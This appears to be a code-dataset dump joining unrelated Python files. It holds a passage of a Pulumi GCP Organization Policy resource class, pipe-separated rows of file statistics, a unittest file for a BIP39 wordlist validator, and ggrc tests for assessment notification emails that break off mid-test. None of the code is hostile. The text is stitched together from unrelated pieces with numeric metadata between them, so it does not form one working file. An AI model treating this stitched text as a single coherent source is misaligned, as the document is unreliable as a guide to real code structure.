Organization Policies can be imported using the `org_id` and the `constraint`, e.g.
```sh
$ pulumi import gcp:organizations/policy:Policy services_policy 123456789/constraints/serviceuser.services
```
It is all right if the constraint contains a slash, as in the example above.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
:param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
:param pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
:param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
:param pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
:param pulumi.Input[int] version: Version of the Policy. Default version is 0.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PolicyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows management of Organization policies for a Google Organization. For more information see
[the official
documentation](https://cloud.google.com/resource-manager/docs/organization-policy/overview) and
[API](https://cloud.google.com/resource-manager/reference/rest/v1/organizations/setOrgPolicy).
## Example Usage
To set policy with a [boolean constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-boolean-constraints):
```python
import pulumi
import pulumi_gcp as gcp
serial_port_policy = gcp.organizations.Policy("serialPortPolicy",
boolean_policy=gcp.organizations.PolicyBooleanPolicyArgs(
enforced=True,
),
constraint="compute.disableSerialPortAccess",
org_id="123456789")
```
To set a policy with a [list constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-list-constraints):
```python
import pulumi
import pulumi_gcp as gcp
services_policy = gcp.organizations.Policy("servicesPolicy",
constraint="serviceuser.services",
list_policy=gcp.organizations.PolicyListPolicyArgs(
allow=gcp.organizations.PolicyListPolicyAllowArgs(
all=True,
),
),
org_id="123456789")
```
Or to deny some services, use the following instead:
```python
import pulumi
import pulumi_gcp as gcp
services_policy = gcp.organizations.Policy("servicesPolicy",
constraint="serviceuser.services",
list_policy=gcp.organizations.PolicyListPolicyArgs(
deny=gcp.organizations.PolicyListPolicyDenyArgs(
values=["cloudresourcemanager.googleapis.com"],
),
suggested_value="compute.googleapis.com",
),
org_id="123456789")
```
To restore the default organization policy, use the following instead:
```python
import pulumi
import pulumi_gcp as gcp
services_policy = gcp.organizations.Policy("servicesPolicy",
constraint="serviceuser.services",
org_id="123456789",
restore_policy=gcp.organizations.PolicyRestorePolicyArgs(
default=True,
))
```
## Import
Organization Policies can be imported using the `org_id` and the `constraint`, e.g.
```sh
$ pulumi import gcp:organizations/policy:Policy services_policy 123456789/constraints/serviceuser.services
```
It is all right if the constraint contains a slash, as in the example above.
:param str resource_name: The name of the resource.
:param PolicyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
boolean_policy: Optional[pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']]] = None,
constraint: Optional[pulumi.Input[str]] = None,
list_policy: Optional[pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']]] = None,
org_id: Optional[pulumi.Input[str]] = None,
restore_policy: Optional[pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']]] = None,
version: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PolicyArgs.__new__(PolicyArgs)
__props__.__dict__["boolean_policy"] = boolean_policy
if constraint is None and not opts.urn:
raise TypeError("Missing required property 'constraint'")
__props__.__dict__["constraint"] = constraint
__props__.__dict__["list_policy"] = list_policy
if org_id is None and not opts.urn:
raise TypeError("Missing required property 'org_id'")
__props__.__dict__["org_id"] = org_id
__props__.__dict__["restore_policy"] = restore_policy
__props__.__dict__["version"] = version
__props__.__dict__["etag"] = None
__props__.__dict__["update_time"] = None
super(Policy, __self__).__init__(
'gcp:organizations/policy:Policy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
boolean_policy: Optional[pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']]] = None,
constraint: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
list_policy: Optional[pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']]] = None,
org_id: Optional[pulumi.Input[str]] = None,
restore_policy: Optional[pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']]] = None,
update_time: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[int]] = None) -> 'Policy':
"""
Get an existing Policy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
:param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
:param pulumi.Input[str] etag: (Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other.
:param pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
:param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
:param pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
:param pulumi.Input[str] update_time: (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z".
:param pulumi.Input[int] version: Version of the Policy. Default version is 0.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PolicyState.__new__(_PolicyState)
__props__.__dict__["boolean_policy"] = boolean_policy
__props__.__dict__["constraint"] = constraint
__props__.__dict__["etag"] = etag
__props__.__dict__["list_policy"] = list_policy
__props__.__dict__["org_id"] = org_id
__props__.__dict__["restore_policy"] = restore_policy
__props__.__dict__["update_time"] = update_time
__props__.__dict__["version"] = version
return Policy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="booleanPolicy")
def boolean_policy(self) -> pulumi.Output[Optional['outputs.PolicyBooleanPolicy']]:
"""
A boolean policy is a constraint that is either enforced or not. Structure is documented below.
"""
return pulumi.get(self, "boolean_policy")
@property
@pulumi.getter
def constraint(self) -> pulumi.Output[str]:
"""
The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
"""
return pulumi.get(self, "constraint")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
(Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="listPolicy")
def list_policy(self) -> pulumi.Output[Optional['outputs.PolicyListPolicy']]:
"""
A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
"""
return pulumi.get(self, "list_policy")
@property
@pulumi.getter(name="orgId")
def org_id(self) -> pulumi.Output[str]:
"""
The numeric ID of the organization to set the policy for.
"""
return pulumi.get(self, "org_id")
@property
@pulumi.getter(name="restorePolicy")
def restore_policy(self) -> pulumi.Output[Optional['outputs.PolicyRestorePolicy']]:
"""
A restore policy is a constraint to restore the default policy. Structure is documented below.
"""
return pulumi.get(self, "restore_policy")
@property
@pulumi.getter(name="updateTime")
def update_time(self) -> pulumi.Output[str]:
"""
(Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z".
"""
return pulumi.get(self, "update_time")
@property
@pulumi.getter
def version(self) -> pulumi.Output[int]:
"""
Version of the Policy. Default version is 0.
"""
return pulumi.get(self, "version")
| 47.771429
| 307
| 0.667077
| 3,249
| 28,424
| 5.676208
| 0.078793
| 0.056068
| 0.057694
| 0.022666
| 0.903861
| 0.889166
| 0.86585
| 0.848606
| 0.833424
| 0.814391
| 0
| 0.009583
| 0.23642
| 28,424
| 594
| 308
| 47.851852
| 0.840122
| 0.476851
| 0
| 0.695167
| 1
| 0
| 0.134179
| 0.040215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159851
| false
| 0.003717
| 0.026022
| 0
| 0.282528
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
073993288533c56b6b371dba51632083cb4a9829
| 4,895
|
py
|
Python
|
tests/test_inituniqresult.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 3
|
2021-02-11T20:37:56.000Z
|
2021-06-11T03:29:15.000Z
|
tests/test_inituniqresult.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | 4
|
2020-10-04T23:11:08.000Z
|
2020-12-23T00:32:52.000Z
|
tests/test_inituniqresult.py
|
ZenulAbidin/bip39validator
|
b78f2db6f46b56b408eef3a51e921e96247a9b46
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from bip39validator.BIP39WordList import BIP39WordList
inituniq_2group_l3 = """quick
quote"""
inituniq_4group_l3 = """quick
quote
risk
rich"""
class TestInitUniqResult(TestCase):
def test_similargroup(self):
bip39 = BIP39WordList("inituniq_2group_l3", string=inituniq_2group_l3)
res = bip39.test_initial_chars(3)
expected_res = [("quick", 1), ("quote", 2)]
self.assertEqual(expected_res, res.similargroup("qu"))
for t in [0, ""]:
try:
res.similargroup(t)
self.fail()
except AssertionError as e:
pass
def test_similar_wordgroup(self):
bip39 = BIP39WordList("inituniq_2group_l3", string=inituniq_2group_l3)
res = bip39.test_initial_chars(3)
expected_res = ["quick", "quote"]
self.assertEqual(expected_res, res.similar_wordgroup("qu"))
for t in [0, ""]:
try:
res.similar_wordgroup(t)
self.fail()
except AssertionError as e:
pass
def test_similar_linegroup(self):
bip39 = BIP39WordList("inituniq_2group_l3", string=inituniq_2group_l3)
res = bip39.test_initial_chars(3)
expected_res = [1, 2]
self.assertEqual(expected_res, res.similar_linegroup("qu"))
for t in [0, ""]:
try:
res.similar_linegroup(t)
self.fail()
except AssertionError as e:
pass
def test_similargroup_many(self):
bip39 = BIP39WordList("inituniq_4group_l3", string=inituniq_4group_l3)
res = bip39.test_initial_chars(3)
expected_res = {"qu": [("quick", 1), ("quote", 2)], "ri":
[("rich", 4), ("risk", 3)]}
self.assertEqual(expected_res, res.similargroup_many(["qu", "ri"]))
for t in ["abc", [], ["a"], 0]:
try:
res.similargroup_many(t)
self.fail()
except AssertionError as e:
pass
def test_similar_wordgroup_many(self):
bip39 = BIP39WordList("inituniq_4group_l3", string=inituniq_4group_l3)
res = bip39.test_initial_chars(3)
expected_res = {"qu": ["quick", "quote"], "ri":
["rich", "risk"]}
self.assertEqual(expected_res, res.similar_wordgroup_many(["qu", "ri"]))
for t in ["abc", [], ["a"], 0]:
try:
res.similar_wordgroup_many(t)
self.fail()
except AssertionError as e:
pass
def test_similar_linegroup_many(self):
bip39 = BIP39WordList("inituniq_4group_l3", string=inituniq_4group_l3)
res = bip39.test_initial_chars(3)
expected_res = {"qu": [1, 2], "ri":
[4, 3]}
self.assertEqual(expected_res, res.similar_linegroup_many(["qu", "ri"]))
for t in ["abc", [], ["a"], 0]:
try:
res.similar_linegroup_many(t)
self.fail()
except AssertionError as e:
pass
def test_similargroup_all(self):
bip39 = BIP39WordList("inituniq_2group_l3", string=inituniq_2group_l3)
res = bip39.test_initial_chars(3)
expected_res = {"qu": [("quick", 1), ("quote", 2)]}
self.assertEqual(expected_res, res.similargroup_all(2))
for t in [0, ""]:
try:
res.similargroup_all(t)
self.fail()
except AssertionError as e:
pass
def test_similar_wordgroup_all(self):
bip39 = BIP39WordList("inituniq_2group_l3", string=inituniq_2group_l3)
res = bip39.test_initial_chars(3)
expected_res = {"qu": ["quick", "quote"]}
self.assertEqual(expected_res, res.similar_wordgroup_all(2))
for t in [0, ""]:
try:
res.similar_wordgroup_all(t)
self.fail()
except AssertionError as e:
pass
def test_similar_linegroup_all(self):
bip39 = BIP39WordList("inituniq_2group_l3", string=inituniq_2group_l3)
res = bip39.test_initial_chars(3)
expected_res = {"qu": [1, 2]}
self.assertEqual(expected_res, res.similar_linegroup_all(2))
for t in [0, ""]:
try:
res.similar_linegroup_all(t)
self.fail()
except AssertionError as e:
pass
def test_groups_length(self):
bip39 = BIP39WordList("inituniq_2group_l3", string=inituniq_2group_l3)
res = bip39.test_initial_chars(3)
expected_res = {"qu": [("quick", 1), ("quote", 2)]}
self.assertEqual(expected_res, res.groups_length(2))
for t in [0, ""]:
try:
res.similar_wordgroup_all(t)
self.fail()
except AssertionError as e:
pass
| 36.259259
| 80
| 0.566088
| 549
| 4,895
| 4.803279
| 0.096539
| 0.083428
| 0.091013
| 0.113766
| 0.906712
| 0.899886
| 0.88358
| 0.834661
| 0.801289
| 0.720137
| 0
| 0.045346
| 0.31522
| 4,895
| 134
| 81
| 36.529851
| 0.741348
| 0
| 0
| 0.606557
| 0
| 0
| 0.071093
| 0
| 0
| 0
| 0
| 0
| 0.163934
| 1
| 0.081967
| false
| 0.081967
| 0.016393
| 0
| 0.106557
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
0762086a89758c3f2bcdb308ff2aa71b96bd9546
| 52,892
|
py
|
Python
|
test/integration/ggrc/notifications/test_assignable_notifications.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-01-12T23:46:00.000Z
|
2019-01-12T23:46:00.000Z
|
test/integration/ggrc/notifications/test_assignable_notifications.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/integration/ggrc/notifications/test_assignable_notifications.py
|
MikalaiMikalalai/ggrc-core
|
f0f83b3638574bb64de474f3b70ed27436ca812a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# pylint: disable=invalid-name,too-many-lines
"""Tests for notifications for models with assignable mixin."""
import unittest
from collections import OrderedDict
from datetime import datetime
import ddt
from freezegun import freeze_time
from mock import patch
from ggrc import db
from ggrc.models import Assessment
from ggrc.models import CustomAttributeDefinition
from ggrc.models import CustomAttributeValue
from ggrc.models import Revision
from ggrc.models import all_models
from ggrc.utils import errors
from integration.ggrc import api_helper, generator
from integration.ggrc.models import factories
from integration.ggrc.models.factories import \
CustomAttributeDefinitionFactory as CAD
from integration.ggrc.notifications import TestNotifications
class TestAssignableNotification(TestNotifications):
"""Base class for testing notification creation for assignable mixin."""
def setUp(self):
super(TestAssignableNotification, self).setUp()
self.client.get("/login")
self._fix_notification_init()
factories.AuditFactory(slug="Audit")
class TestAssignableNotificationUsingImports(TestAssignableNotification):
"""Tests for notifications when interacting with objects through imports."""
@patch("ggrc.notifications.common.send_email")
def test_assessment_created_notifications(self, send_email):
"""Test if importing new assessments results in notifications for all."""
self.assertEqual(self._get_notifications().count(), 0)
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
titles = [asmt.title for asmt in Assessment.query]
query = self._get_notifications(notif_type="assessment_open")
self.assertEqual(query.count(), 6)
# check email content
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"New assessments were created", content)
for asmt_title in titles:
self.assertIn(asmt_title, content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_updated_notifications(self, send_email):
"""Test if updating an assessment results in a notification."""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
asmt.status = Assessment.PROGRESS_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmt_id)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt.slug),
(u"Title", u"New Assessment 1 title"),
]))
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
# check email content
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Assessments have been updated", content)
# the assessment updated notification should be sent even if there exists a
# status change notification , regardless of the order of actions
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"Title", u"New Assessment 1 title 2"),
]))
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.DONE_STATE),
]))
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"Title", u"New Assessment 1 title 3"),
]))
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertIn(u"Assessments have been updated", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_ca_updated_notifications(self, send_email):
"""Test if updating assessment custom attr. results in a notification."""
CAD(definition_type="assessment", title="CA_misc_remarks")
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt.slug),
(u"CA_misc_remarks", u"CA new value"),
]))
asmt = Assessment.query.get(asmts["A 1"].id)
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
# check email content
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Assessments have been updated", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_url_updated_notifications(self, send_email):
"""Test if updating assessment URLs results in a notification."""
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id = asmt.id
asmt.status = Assessment.PROGRESS_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmt_id)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt.slug),
(u"Evidence Url", u"www.foo-url.bar"),
]))
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
# check email content
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Assessments have been updated", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_attaching_assessment_evidence_notifications(self, send_email):
"""Test if attaching assessment evidence results in a notification."""
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id = asmt.id
asmt.status = Assessment.PROGRESS_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmt_id)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt.slug),
(u"Evidence File", u"https://gdrive.com/qwerty1/view evidence.txt"),
]))
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
# check email content
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Assessments have been updated", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_person_updated_notifications(self, send_email):
"""Test if updating assessment people results in a notification."""
self.import_file("assessment_template_no_warnings.csv")
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id = asmt.id
asmt.status = Assessment.PROGRESS_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmt_id)
# change assignee
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt.slug),
(u"Assignee*", u"john@doe.com"),
]))
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
# clear notifications
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmt_id)
# change verifier
asmt = Assessment.query.get(asmt_id)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt.slug),
(u"Verifiers", u"bob@dylan.com"),
]))
query = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(query.count(), 1)
# check email content
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_state_change_notifications(self, send_email):
"""Test if updating assessment state results in notifications."""
# pylint: disable=too-many-statements
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_id, asmt_slug = asmt.id, asmt.slug
# test starting an assessment
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.PROGRESS_STATE),
]))
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertRegexpMatches(content, ur"Assessment\s+has\s+been\s+started")
# test submitting assessment for review
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.DONE_STATE),
]))
query = self._get_notifications(notif_type="assessment_ready_for_review")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Assessments in review", content)
# test verifying an assessment
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.FINAL_STATE),
# (will get verified, because there is a verifier assigned)
]))
query = self._get_notifications(notif_type="assessment_verified")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Verified assessments", content)
# test reopening a verified assessment
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.PROGRESS_STATE),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
# sending an assessment back to "in review" (i.e. the undo action)
asmt = Assessment.query.get(asmt_id)
asmt.status = Assessment.VERIFIED_STATE
db.session.commit()
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.DONE_STATE),
]))
query = self._get_notifications()
self.assertEqual(query.count(), 0) # there should be no notification!
# test declining an assessment
asmt = Assessment.query.get(asmt_id)
asmt.status = Assessment.DONE_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.PROGRESS_STATE),
]))
query = self._get_notifications(notif_type="assessment_declined")
self.assertEqual(query.count(), 1)
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Declined assessments", content)
self.assertIn(u"Reopened assessments", content)
# directly submitting a not started assessment for review
asmt = Assessment.query.get(asmt_id)
asmt.status = Assessment.START_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.DONE_STATE),
]))
query = self._get_notifications(notif_type="assessment_ready_for_review")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Assessments in review", content)
# directly completing a not started assessment
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"Verifiers", None),
(u"State*", Assessment.START_STATE),
]))
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.FINAL_STATE),
]))
query = self._get_notifications(notif_type="assessment_completed")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Completed assessments", content)
# test reopening a completed assessment
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.PROGRESS_STATE),
]))
query = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Reopened assessments", content)
# completing an assessment in progress
self.assertEqual(self._get_notifications().count(), 0)
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", Assessment.FINAL_STATE),
]))
query = self._get_notifications(notif_type="assessment_completed")
self.assertEqual(query.count(), 1)
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertIn(u"Completed assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_multiple_assessment_state_changes_notification(self, send_email):
"""Test if several assessment state changes result in a single notification.
Users should only be notificed about the last state change, and not about
every state change that happened.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
asmt = Assessment.query.get(asmts["A 1"].id)
asmt_slug = asmt.slug
asmt.status = Assessment.START_STATE
db.session.commit()
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
# make multiple state transitions and check that only the last one is
# actually retained
states = (
Assessment.PROGRESS_STATE,
Assessment.DONE_STATE,
Assessment.PROGRESS_STATE,
Assessment.FINAL_STATE,
)
for new_state in states:
self.import_data(OrderedDict([
(u"object_type", u"Assessment"),
(u"Code*", asmt_slug),
(u"State*", new_state),
]))
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
